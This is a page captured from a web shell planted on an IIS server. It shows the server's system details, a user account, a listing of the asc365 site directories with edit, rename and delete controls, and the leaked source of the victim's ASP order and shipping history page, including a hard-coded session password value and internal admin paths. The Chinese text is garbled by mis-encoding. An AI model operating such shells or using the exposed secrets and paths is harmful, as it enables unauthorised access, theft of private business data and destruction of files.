Webshell Akmal archtte id
System:
Microsoft Windows NT 10.0.20348.0
Server:
Microsoft-IIS/10.0
User:
buyyou
Directory:
C:
\
MyData
\
WWW
\
asc365
\
Name
Size
Type
Actions
ASC365_CANADA
-
Directory
Rename
Delete
ASC365_Store01
-
Directory
Rename
Delete
aspnet_client
-
Directory
Rename
Delete
CompanyImage
-
Directory
Rename
Delete
TJGS_USA
-
Directory
Rename
Delete
zhijian
-
Directory
Rename
Delete
Memo.inc
0 bytes
.inc
Edit
Rename
Delete
web.config
213 bytes
.config
Edit
Rename
Delete
<html> <head> <style>a{TEXT-DECORATION:none}</style> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <title>History</title> <% loginnumber=session("Webpassed") if loginnumber<>"%asc365com%" then response.End() end if %> </head> <body> <div align="center"> <% Thispage ="http://" & Request.ServerVariables("SERVER_NAME") & ":" & Request.ServerVariables("Server_Port") & Request.ServerVariables("URL") Set fs=Server.CreateObject("Scripting.FileSystemObject") Function YYMMDD(YMD) Y_Y = DatePart("yyyy",YMD) M_M = DatePart("m",YMD) : If Len(M_M) < 2 Then M_M = "0" & M_M D_D = DatePart("d",YMD) : If Len(D_D) < 2 Then D_D = "0" & D_D H_H = DatePart("h",YMD) : If Len(H_H) < 2 Then H_H = "0" & H_H N_N = DatePart("n",YMD) : If Len(N_N) < 2 Then N_N = "0" & N_N S_S = DatePart("s",YMD) : If Len(S_S) < 2 Then S_S = "0" & S_S YYMMDD = Y_Y & M_M & D_D & H_H & N_N & S_S end function %> <font color="#669900" face="Verdana">��ʷ����װ����ϸ</font> <br> <br> <% Dim JYZ(99,1) Dim JYZ_JS JYZ_JS=0 Temp=Server.MapPath("..\..\..\ASC365_CWZ\Web\WebAdmin") & "\BUMENInf_YT" 'ҵ�������� If (fs.FileExists(Temp))=true then Set f=fs.OpenTextFile(Temp, 1) do while f.AtEndOfStream = false YY=trim(f.ReadLine) if left(YY,2)<>"//" and Lcase(left(YY,1))="a" then str=Split(YY,"|") JYZ(right(str(0),2)*1,0)="0" & right(str(0),2) 'ҵ������� JYZ(right(str(0),2)*1,1)=str(2) 'ҵ�����Ա ' JYZ_JS = JYZ_JS+1 end if loop ' JYZ(JYZ_JS)="���в���" 'ҵ�����������Ϊ�գ����Dz����е� ' JYZ_JS = JYZ_JS+1 end if f.Close Set f=Nothing Dim NNN(499,16) '��Ʒ�����������ã�500�ֲ�Ʒ��ÿ�ֲ�Ʒ41���ֶ� Dim DHNUM_i 'ÿ�ζ���Ʒ�ֵ����� '-------------------------------------------------------------------------- dim DHMX(2000,14) '0-���,0-��Ʒ����,1-������λ,2-�����ƻ�����,3-ʵ�ʷ�������,4-�ƻ� - ʵ��,5-��;����,6-�������,7-��С���,8-��Ʒ����,9- �����ϼƣ�10-����ϼ�M3 '11-ë�غϼ�Kg,12-��ý��,13-�ɹ���� dim DHMXJS Dim TJJEHJ '��ý��ϼ� Dim CGJEHJ '�ɹ����ϼ� Dim ZXSLHJ 'װ�������ϼ� Dim TJHJ '����ϼ� Dim MZHJ 'ë�غϼ� Dim TiJiao(1) '�ύʱ��0-ʱ�䣬1-IP��ַ '-------------------------------------------------------------------------- Dim SUBFOLDERNAME(100) Dim SUBFOLDERNUM Dim FILENAME(500) Dim FILENUM Dim DHJE '������� Dim JHJE '������� Dim JSJE '������ for i=0 to 100 SUBFOLDERNAME(i)=null next Temp=Server.MapPath("..\..\Admin") & "\CPDGBJ\" '��Ʒ��������Ŀ¼ set fo=fs.GetFolder(Temp) SUBFOLDERNUM=0 for each x in fo.SubFolders SUBFOLDERNAME(SUBFOLDERNUM)=x.Name ' & "���ջ�" SUBFOLDERNUM=SUBFOLDERNUM+1 next set fo=nothing for i=0 to SUBFOLDERNUM-1 for j=i+1 to SUBFOLDERNUM-1 if SUBFOLDERNAME(i)*1>SUBFOLDERNAME(j)*1 then YY=SUBFOLDERNAME(i) SUBFOLDERNAME(i)=SUBFOLDERNAME(j) SUBFOLDERNAME(j)=YY end if next next for i=0 to SUBFOLDERNUM-1 SUBFOLDERNAME(i)=SUBFOLDERNAME(i) & "���ջ�" next %> <table border="0" width="1000" height="5" style="border-collapse: collapse"> <% II=0 for i= 0 to SUBFOLDERNUM-1 step 5 response.write "<tr>" for jj= 1 to 5 response.write "<td height='5' width='1050' bgcolor='#EEEEEE'><font size='3' >" response.write "<a href='"& Thispage & "?LL="& left(SUBFOLDERNAME(II),4)& "'>" response.write SUBFOLDERNAME(II) &"</a></td>" :II=II+1 next response.write"</tr>" next '--------------------------------------end------------------------------------ %> </table> <br> <% LLP=Request.Querystring("LL") if len(LLP)<>0 then Temp=Server.MapPath("..\..\Admin") & "\CPDGBJ\" & LLP & "\" '��Ʒ��������Ŀ¼ set fo=fs.GetFolder(Temp) FILENUM=0 for each x in fo.files Namee=x.Name if lcase(right(Namee,4))=".sss" then FILENAME(FILENUM)=Namee 'Mid(Namee,11,8) FILENUM=FILENUM+1 end if next set fo=nothing for i_0=0 to FILENUM-2 for j_0=i_0+1 to FILENUM-1 if left(FILENAME(i_0),8)>left(FILENAME(j_0),8) then ij_0=FILENAME(i_0) FILENAME(i_0)=FILENAME(j_0) FILENAME(j_0)=ij_0 end if next next end if %> <table border="0" width="1000" height="5" style="border-collapse: collapse"> <% II=4 for i= 0 to FILENUM-1 if II=4 then response.write "<tr>" II=0 end if if len(FILENAME(i))<>0 then response.write "<td height='5' width='1050' bgcolor='#FFFFee'><font size='2' >" response.write"<a href='"& Thispage & "?LL=" response.write LLP & "&LN=" response.write FILENAME(i)& "'>" response.write left(FILENAME(i),4)&"��"&Mid(FILENAME(i),5,2)&"��"&Mid(FILENAME(i),7,2)&"�ն�����װ��Ƚϱ�" & "</a></td>" II=II+1 end if if II=4 then response.write "</tr>" end if next if II<>4 then response.write "</tr>" end if response.write "<br>" '-------------------------------------end------------------------------------- %> </table> <br> <% LLN= Request.Querystring("LN") if len(LLN)<>0 then response.write "<font color='#FF0000'>"&"������ʾ����: " & Mid(LLN,1,4)&"��"&Mid(LLN,5,2)&"��"&Mid(LLN,7,2)&"�ն�����װ��Ƚϱ� </font><br>" response.write "<br>" Temp=Server.MapPath("..\..\Admin") & "\CPDGBJ\" & LLP & "\" & LLN If (fs.FileExists(Temp))=true then Set f=fs.OpenTextFile(Temp, 1) DHMXJS=0 do while f.AtEndOfStream = false YYXX=Trim(f.ReadLine) if len(YYXX)<>0 then if IsNumeric(left(YYXX,6)) then str=Split(YYXX,"|") for II=0 to Ubound(str) DHMX(DHMXJS,II)=str(II) next DHMXJS=DHMXJS+1 end if end if loop f.Close: Set f=Nothing end if for i=0 to DHMXJS-1 if not IsNumeric(DHMX(i,2)) then DHMX(i,2)=0 if not IsNumeric(DHMX(i,3)) then DHMX(i,3)=0 'DHMX(i,4)=Round((DHMX(i,2)*1-DHMX(i,3)*1),2) if not IsNumeric(DHMX(i,4)) then DHMX(i,4)=0 if not IsNumeric(DHMX(i,5)) then DHMX(i,5)=0 if not IsNumeric(DHMX(i,6)) then DHMX(i,6)=0 if not IsNumeric(DHMX(i,7)) then DHMX(i,7)=0 if not IsNumeric(DHMX(i,9)) then DHMX(i,9)=0 if not IsNumeric(DHMX(i,10)) then DHMX(i,10)=0 if not IsNumeric(DHMX(i,11)) then DHMX(i,11)=0 if not IsNumeric(DHMX(i,12)) then DHMX(i,12)=0 if not IsNumeric(DHMX(i,13)) then DHMX(i,13)=0 next %> <table border="1" width="1540" height="20" style="border-collapse: collapse" bordercolor="#e0e0e0"> <tr> <td width="40" height="20" bgcolor="#DDDDDD" align="center" valign="middle">���</td> <td width="80" height="20" bgcolor="#DDDDDD" align="center" valign="middle">��Ʒ����</td> <td width="40" height="20" bgcolor="#DDDDDD" align="center" valign="middle">��λ</td> <td width="80" height="20" bgcolor="#DDDDDD" align="center" valign="middle">��������</td> <td width="80" height="20" bgcolor="#DDDDDD" align="center" valign="middle">��������</td> <td width="80" height="20" bgcolor="#DDDDDD" align="center" valign="middle">�ƻ�-ʵ��</td> <td width="80" height="20" bgcolor="#DDDDDD" align="center" valign="middle">��;����</td> <td width="80" height="20" bgcolor="#DDDDDD" align="center" valign="middle">�������</td> <td width="80" height="20" bgcolor="#DDDDDD" align="center" valign="middle">��С���</td> <td width="400" height="20" bgcolor="#DDDDDD" align="center" valign="middle">�� Ʒ �� ��</td> <td width="100" height="20" bgcolor="#DDDDDD" align="center" valign="middle">�����ϼ�</td> <td width="100" height="20" bgcolor="#DDDDDD" align="center" valign="middle">����ϼ�M3</td> <td width="100" height="20" bgcolor="#DDDDDD" align="center" valign="middle">ë�غϼ�Kg</td> <td width="80" height="20" bgcolor="#DDDDDD" align="center" valign="middle">��ý��</td> <td width="80" height="20" bgcolor="#DDDDDD" align="center" valign="middle">�ɹ����</td> </tr> <% DHJE_Z=0 for js=0 to DHMXJS-1 %> <tr> <td width="40" height="20" <%if (js mod 2)=0 then response.write "bgcolor='#CCFFFF'"%> align="center" valign="middle"><%=JS*1+1%></td> <td width="80" height="20" <%if (js mod 2)=0 then response.write "bgcolor='#CCFFFF'"%> align="center" valign="middle"><a href="productdetail.asp?productid=<%=DHMX(JS,0)%>" target="_blank"><%=DHMX(JS,0)%></a></td> <td width="40" height="20" <%if (js mod 2)=0 then response.write "bgcolor='#CCFFFF'"%> align="center" valign="middle"><%=DHMX(JS,1)%></td> <%if DHMX(JS,2)<>0 then%> <td width="80" height="20" <%if (js mod 2)=0 then response.write "bgcolor='#CCFFFF'"%> align="center" valign="middle"><%=DHMX(JS,2)%></td> <%else%> <td width="80" height="20" <%if (js mod 2)=0 then response.write "bgcolor='#CCFFFF'"%> align="center" valign="middle"></td> <%end if%> <%if DHMX(JS,3)<>0 then %> <td width="80" height="20" <%if (js mod 2)=0 then response.write "bgcolor='#CCFFFF'"%> align="center" valign="middle"><%=DHMX(JS,3)%></td> <%else%> <td width="80" height="20" <%if (js mod 2)=0 then response.write "bgcolor='#CCFFFF'"%> align="center" valign="middle"></td> <%end if%> <%if DHMX(JS,4)<>0 then %> <td width="80" height="20" <%if (js mod 2)=0 then response.write "bgcolor='#CCFFFF'"%> align="center" valign="middle"><% =DHMX(JS,4)%></td> <%else%> <td width="80" height="20" <%if (js mod 2)=0 then response.write "bgcolor='#CCFFFF'"%> align="center" valign="middle"></td> <%end if%> <%if DHMX(JS,5)<>0 then %> <td width="80" height="20" <%if (js mod 2)=0 then response.write "bgcolor='#CCFFFF'"%> align="center" valign="middle"><% =DHMX(JS,5)%></td> <%else%> <td width="80" height="20" <%if (js mod 2)=0 then response.write "bgcolor='#CCFFFF'"%> align="center" valign="middle"></td> <%end if%> <%if DHMX(JS,6)<>0 then %> <td width="80" height="20" <%if (js mod 2)=0 then response.write "bgcolor='#CCFFFF'"%> align="center" valign="middle"><% =DHMX(JS,6)%></td> <%else%> <td width="80" height="20" <%if (js mod 2)=0 then response.write "bgcolor='#CCFFFF'"%> align="center" valign="middle"></td> <%end if%> <%if DHMX(JS,7)<>0 then %> <td width="80" height="20" <%if (js mod 2)=0 then response.write "bgcolor='#CCFFFF'"%> align="center" valign="middle"><% =DHMX(JS,7)%></td> <%else%> <td width="80" height="20" <%if (js mod 2)=0 then response.write "bgcolor='#CCFFFF'"%> align="center" valign="middle"></td> <%end if%> <td width="400" height="20" <%if (js mod 2)=0 then response.write "bgcolor='#CCFFFF'"%> align="left" valign="middle"><%=DHMX(JS,8)%></td> <%if DHMX(JS,9)<>0 then %> <td width="100" height="20" <%if (js mod 2)=0 then response.write "bgcolor='#CCFFFF'"%> align="center" valign="middle"><% =DHMX(JS,9)%></td> <%else%> <td width="100" height="20" <%if (js mod 2)=0 then response.write "bgcolor='#CCFFFF'"%> align="center" valign="middle"></td> <%end if%> <%if DHMX(JS,10)<>0 then %> <td width="100" height="20" <%if (js mod 2)=0 then response.write "bgcolor='#CCFFFF'"%> align="center" valign="middle"><%=DHMX(JS,10)%></td> <%else%> <td width="100" height="20" <%if (js mod 2)=0 then response.write "bgcolor='#CCFFFF'"%> align="center" valign="middle"></td> <%end if%> <%if DHMX(JS,11)<>0 then %> <td width="100" height="20" <%if (js mod 2)=0 then response.write "bgcolor='#CCFFFF'"%> align="center" valign="middle"><% =DHMX(JS,11)%></td> <%else%> <td width="100" height="20" <%if (js mod 2)=0 then response.write "bgcolor='#CCFFFF'"%> align="center" valign="middle"></td> <%end if%> <%if DHMX(JS,12)<>0 then %> <td width="80" height="20" <%if (js mod 2)=0 then response.write "bgcolor='#CCFFFF'"%> align="center" valign="middle"><% =DHMX(JS,12)%></td> <%else%> <td width="80" height="20" <%if (js mod 2)=0 then response.write "bgcolor='#CCFFFF'"%> align="center" valign="middle"></td> <%end if%> <%if DHMX(JS,13)<>0 then %> <td width="80" height="20" <%if (js mod 2)=0 then response.write "bgcolor='#CCFFFF'"%> align="center" valign="middle"><% =DHMX(JS,13)%></td> <%else%> <td width="80" height="20" <%if (js mod 2)=0 then response.write "bgcolor='#CCFFFF'"%> align="center" valign="middle"></td> <%end if%> <% if IsNumeric(DHMX(JS,9)) then ZXSLHJ=Round((ZXSLHJ*1+DHMX(JS,9)*1),2) if IsNumeric(DHMX(JS,10)) then TJHJ=Round((TJHJ*1+DHMX(JS,10)*1),2) if IsNumeric(DHMX(JS,11)) then MZHJ=Round((MZHJ*1+DHMX(JS,11)*1),2) if IsNumeric(DHMX(JS,12)) then TJJEHJ=Round((TJJEHJ*1+DHMX(JS,12)*1),2) if IsNumeric(DHMX(JS,13)) then CGJEHJ=Round((CGJEHJ*1+DHMX(JS,13)*1),2) %> </tr> <%next%> <tr> <td width="40" height="20" bgcolor="#DDDDDD" align="center" valign="middle">���</td> <td width="80" height="20" bgcolor="#DDDDDD" align="center" valign="middle">��Ʒ����</td> <td width="40" height="20" bgcolor="#DDDDDD" align="center" valign="middle">��λ</td> <td width="80" height="20" bgcolor="#DDDDDD" align="center" valign="middle">��������</td> <td width="80" height="20" bgcolor="#DDDDDD" align="center" valign="middle">��������</td> <td width="80" height="20" bgcolor="#DDDDDD" align="center" valign="middle">�ƻ�-ʵ��</td> <td width="80" height="20" bgcolor="#DDDDDD" align="center" valign="middle">��;����</td> <td width="80" height="20" bgcolor="#DDDDDD" align="center" valign="middle">�������</td> <td width="80" height="20" bgcolor="#DDDDDD" align="center" valign="middle">��С���</td> <td width="400" height="20" bgcolor="#DDDDDD" align="center" valign="middle">�� Ʒ �� ��</td> <td width="100" height="20" bgcolor="#DDDDDD" align="center" valign="middle">�����ϼ�</td> <td width="100" height="20" bgcolor="#DDDDDD" align="center" valign="middle">����ϼ�M3</td> <td width="100" height="20" bgcolor="#DDDDDD" align="center" valign="middle">ë�غϼ�Kg</td> <td width="80" height="20" bgcolor="#DDDDDD" align="center" valign="middle">��ý��</td> <td width="80" height="20" bgcolor="#DDDDDD" align="center" valign="middle">�ɹ����</td> </tr> </table> <table border="1" width="1000" height="20" bordercolor="#f0f0f0" style="border-collapse: collapse"> <tr> <td height="20" width="100" bgcolor="efefef" align="center">װ�������ϼ�</td> <td height="20" width="100" align="center"><%=ZXSLHJ%></td> <td height="20" width="100" bgcolor="efefef" align="center">����ϼ�</td> <td height="20" width="100" align="center"><%=TJHJ%></td> <td height="20" width="100" bgcolor="efefef" align="center">ë�غϼ�</td> <td height="20" width="100" align="center"><%=MZHJ%></td> <td height="20" width="100" bgcolor="efefef" align="center">��ý��ϼ�</td> <td height="20" width="100" align="center"><%=TJJEHJ%></td> <td height="20" width="100" bgcolor="efefef" align="center">�ɹ����ϼ�</td> <td height="20" width="100" align="center"><%=CGJEHJ%></td> </tr> </table> <% '-------------------------------------------------------------------------- Temp=Server.MapPath("..\..\Admin") & "\HYYBDH_MX\" '��Ʒ��������Ŀ¼ set fo=fs.GetFolder(Temp) SUBFOLDERNUM=1 for each x in fo.SubFolders if IsNumeric(x.Name) then SUBFOLDERNAME(SUBFOLDERNUM)=x.Name SUBFOLDERNUM=SUBFOLDERNUM+1 end if next set fo=nothing for i=1 to SUBFOLDERNUM-1 for j=i+1 to SUBFOLDERNUM-1 if SUBFOLDERNAME(i)*1>SUBFOLDERNAME(j)*1 then YY=SUBFOLDERNAME(i) SUBFOLDERNAME(i)=SUBFOLDERNAME(j) SUBFOLDERNAME(j)=YY end if next next '-------------------------------------------------------------------------- for no=1 to SUBFOLDERNUM-1 'REDim NNN(499,16) '��Ʒ�����������ã�500�ֲ�Ʒ��ÿ�ֲ�Ʒ41���ֶ� DHNUM_i=0 Tech=Server.MapPath("../../Admin/HYYBDH_MX/"& SUBFOLDERNAME(no) & "/" & left(LLN,4) & "/" & left(LLN,8) & ".txt") '�ҵ�Ԥ�������ļ� '----------------�ض�������------------------ If (fs.FileExists(Tech))=true then response.write "<br><br><font color='#FF0000'>"&"������ʾ����: " &JYZ(SUBFOLDERNAME(no),0) &"��(" &JYZ(SUBFOLDERNAME(no),1) &")"& left(LLN,4)&"��"&Mid(LLN,5,2)&"��"&Mid(LLN,7,2)&"�յ�װ���嵥 </font><br><br>" Set f=fs.OpenTextFile(Tech, 1) do while f.AtEndOfStream = false YY=Trim(f.ReadLine) if left(YY,2)<>"**" and left(YY,2)<>"##" then str=split(YY,"|") for i=0 to 16 NNN(DHNUM_i,i)=str(i) next DHNUM_i=DHNUM_i+1 elseif left(YY,2)="**" then str=split(YY,"|") TiJiao(0)=str(1) TiJiao(1)=str(2) end if loop f.close set f=nothing %> <table border="1" width="1830" height="20" bordercolor="#f0f0f0" style="border-collapse: collapse"> <tr> <td height="20" width="40" align="center">���</td> <td height="20" width="70" align="center">��Ʒ����</td> <td height="20" width="40" align="center">��λ</td> <td height="20" width="40" align="center">����</td> <td height="20" width="40" align="center">����</td> <td height="20" width="80" align="center">��װ���</td> <td height="20" width="500" align="center">��Ʒ����</td> <td height="20" width="100" align="center">����ϼ�M3</td> <td height="20" width="100" align="center">ë�غϼ�Kg</td> <td height="20" width="100" align="center">��λ���M3</td> <td height="20" width="100" align="center">��λë��Kg</td> <td height="20" width="100" align="center">��װ�ߴ�cm</td> <td height="20" width="200" align="center">��ע</td> <td height="20" width="80" align="center">��õ���</td> <td height="20" width="80" align="center">��ý��</td> <td height="20" width="80" align="center">�ɹ�����</td> <td height="20" width="80" align="center">�ɹ����</td> </tr> <% TJJEHJ=0 CGJEHJ=0 ZXSLHJ=0 TJHJ=0 MZHJ=0 for i=0 to DHNUM_i-1 %> <tr> <td height="20" width="40" <%if (i mod 2)=0 then response.write "bgcolor='#CCFFFF'"%> align="center"><%=i+1%></td> <td height="20" width="70" <%if (i mod 2)=0 then response.write "bgcolor='#CCFFFF'"%> align="center"><%=NNN(i,1)%></td> <td height="20" width="40" <%if (i mod 2)=0 then response.write "bgcolor='#CCFFFF'"%> align="center"><%=NNN(i,2)%></td> <td height="20" width="40" <%if (i mod 2)=0 then response.write "bgcolor='#CCFFFF'"%> align="right"><%=NNN(i,3)%></td> <td height="20" width="40" <%if (i mod 2)=0 then response.write "bgcolor='#CCFFFF'"%> align="center"><%=NNN(i,4)%></td> <td height="20" width="80" <%if (i mod 2)=0 then response.write "bgcolor='#CCFFFF'"%> align="left"><%=NNN(i,5)%></td> <td height="20" width="500" <%if (i mod 2)=0 then response.write "bgcolor='#CCFFFF'"%> align="left"><%=NNN(i,6)%></td> <td height="20" width="100" <%if (i mod 2)=0 then response.write "bgcolor='#CCFFFF'"%> align="right"><%=NNN(i,7)%></td> <td height="20" width="100" <%if (i mod 2)=0 then response.write "bgcolor='#CCFFFF'"%> align="right"><%=NNN(i,8)%></td> <td height="20" width="100" <%if (i mod 2)=0 then response.write "bgcolor='#CCFFFF'"%> align="right"><%=NNN(i,9)%></td> <td height="20" width="100" <%if (i mod 2)=0 then response.write "bgcolor='#CCFFFF'"%> align="right"><%=NNN(i,10)%></td> <td height="20" width="100" <%if (i mod 2)=0 then response.write "bgcolor='#CCFFFF'"%> align="left"><%=NNN(i,11)%></td> <td height="20" width="200" <%if (i mod 2)=0 then response.write "bgcolor='#CCFFFF'"%> align="left"><%=NNN(i,12)%></td> <td height="20" width="80" <%if (i mod 2)=0 then response.write "bgcolor='#CCFFFF'"%> align="right"><%=NNN(i,13)%></td> <td height="20" width="80" <%if (i mod 2)=0 then response.write "bgcolor='#CCFFFF'"%> align="right"><%=NNN(i,14)%></td> <td height="20" width="80" <%if (i mod 2)=0 then response.write "bgcolor='#CCFFFF'"%> align="right"><%=NNN(i,15)%></td> <td height="20" width="80" <%if (i mod 2)=0 then response.write "bgcolor='#CCFFFF'"%> align="right"><%=NNN(i,16)%></td> <% if IsNumeric(NNN(i,4)) then ZXSLHJ=Round((ZXSLHJ*1+NNN(i,4)*1),2) if IsNumeric(NNN(i,7)) then TJHJ=Round((TJHJ*1+NNN(i,7)*1),2) if IsNumeric(NNN(i,8)) then MZHJ=Round((MZHJ*1+NNN(i,8)*1),2) if IsNumeric(NNN(i,14)) then TJJEHJ=Round((TJJEHJ*1+NNN(i,14)*1),2) if IsNumeric(NNN(i,16)) then CGJEHJ=Round((CGJEHJ*1+NNN(i,16)*1),2) %> </tr> <% next %> <tr> <td height="20" width="40" align="center">���</td> <td height="20" width="70" align="center">��Ʒ����</td> <td height="20" width="40" align="center">��λ</td> <td height="20" width="40" align="center">����</td> <td height="20" width="40" align="center">����</td> <td height="20" width="80" align="center">��װ���</td> <td height="20" width="500" align="center">��Ʒ����</td> <td height="20" width="100" align="center">����ϼ�M3</td> <td height="20" width="100" align="center">ë�غϼ�Kg</td> <td height="20" width="100" align="center">��λ���M3</td> <td height="20" width="100" align="center">��λë��Kg</td> <td height="20" width="100" align="center">��װ�ߴ�cm</td> <td height="20" width="200" align="center">��ע</td> <td height="20" width="80" align="center">��õ���</td> <td height="20" width="80" align="center">��ý��</td> <td height="20" width="80" align="center">�ɹ�����</td> <td height="20" width="80" align="center">�ɹ����</td> </tr> </table> <table border="1" width="1500" height="20" bordercolor="#f0f0f0" style="border-collapse: collapse"> <tr> <td height="20" width="300" align="left">�ύʱ�䣺<%=TiJiao(0)%></td> <td height="20" width="200" align="left">IP��ַ��<%=TiJiao(1)%></td> <td height="20" width="100" bgcolor="efefef" align="center">װ�������ϼ�</td> <td height="20" width="100" align="center"><%=ZXSLHJ%></td> <td height="20" width="100" bgcolor="efefef" align="center">����ϼ�</td> <td height="20" width="100" align="center"><%=TJHJ%></td> <td height="20" width="100" bgcolor="efefef" align="center">ë�غϼ�</td> <td height="20" width="100" align="center"><%=MZHJ%></td> <td height="20" width="100" bgcolor="efefef" align="center">��ý��ϼ�</td> <td height="20" width="100" align="center"><%=TJJEHJ%></td> <td height="20" width="100" bgcolor="efefef" align="center">�ɹ����ϼ�</td> <td height="20" width="100" align="center"><%=CGJEHJ%></td> </tr> </table> <% end if '------------------------------------------------ next '-------------------------------------------------------------------------- end if %> </div> </body> </html>